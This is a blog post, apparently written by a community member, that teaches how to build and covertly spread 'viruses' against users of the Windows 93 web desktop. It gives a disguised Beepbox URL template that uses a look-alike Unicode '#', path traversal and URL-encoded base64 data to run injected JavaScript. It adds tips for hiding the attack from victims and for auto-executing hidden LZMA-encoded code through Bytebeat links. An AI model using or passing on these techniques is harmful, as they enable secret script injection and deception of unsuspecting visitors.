Need a website? Contact me!
Discord: Melissa2000#8019
Discord: Melissa2000#8019
Viruses are malicious programs that often have to go around systems of protection to access certain information on a computer, use the computer for hard computations or make it act funny. Due to Windows 93 design, this is a rather easy part because there are no systems of protection. The harder part is getting the virus to spread and infect users without their knowledge.
This is pretty straight forward, when Trollbox was still up and people could send /exe codes, others would click them wondering what they do. This used to be a very common method of infection with viruses, the most notable one being "im so gay" virus.
Beepbox URLs can be very long and contain a homogenous mass of characters, which makes it easy to hide scripts inside. Another helpful thing is the existance of a Chinese UNICODE character (#). It looks very similar to #. This can be used to make the first part of URL look legit, then you can add /../ later to "exit the directory" and add a real # tag following to run your javascript. Below is an example of a such virus.
http://www.windows93.net/#!beepbox%20#6n41z0s0u1%7C2kbl00e03t7m0x0y0H0$0a7g0fj7i0r1o43210T0w1f1d1c0q0G0L4B0h0v0T0w1f1d1c0q0G0L4B0h0v0T0w1f1d1c0q0G0L4B0h0v0T0w1f1d1c0q0G0L4B0h0v0T2w1d1v0G0q0B0L4b4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4h4gp1pAQNQwFBGFxU7sAGxR10000000/%2E%2E/#!%6a%73%20%64%61%74%61:%74%65%78%74/%70%6c%61%69%6e;%62%61%73%65%36%34,[BASE 64 ENCODED JAVASCRIPT]
NOTE: it is important to refresh the website shorty after installing the virus and open a real beepbox song, otherwise users will realize it was a virus because the browser would unscramble URL encoded strings which would then manifest as "#js data:text/javascript;base64,..."
Bytebeat can be used to secretly install viruses on Windows 93 while someone is visiting your website (evil laughter). It works because when you open a Bytebeat URL it will automatically execute the content. In case you haven't observed Bytebeat URLs yet, here is an example of one
http://www.windows93.net/c/programs/bytebeat/index.php#t=0&e=1&s=8000&bb=5d000001006a0000000000000000361bc88cef3d0ed867b60d02981cacfbb40c1e0b2bfad848d446a7bb5166669cbdcf889f1e2d6951fb96996005ee47635d9e3bb86a43ccad8acef38bfd566633621b9c298c37116b281bfa1720c1b30a14d7268aa456a1335b9dfeba12b43556741f78546d5de09fff49bf0000
At couple of first sights you can already observe that the code is hidden within the "bb" query argument.
http://www.windows93.net/c/programs/bytebeat/index.php#t=0&e=1&s=8000&bb=[ENCODED-CODE-HERE]
After investigating a bit, I found that the encoding used is called "LZMA" (it is actually a compression algorithm). You can encode your own strings using it here.
If you wish to add something to the blog or if you are confused about something, feel free to contact me on Discord. Since Jankenpopp flipped off the community, breach of trust is no longer a problem so I will be able to write more blogs such as this one if you are interested.
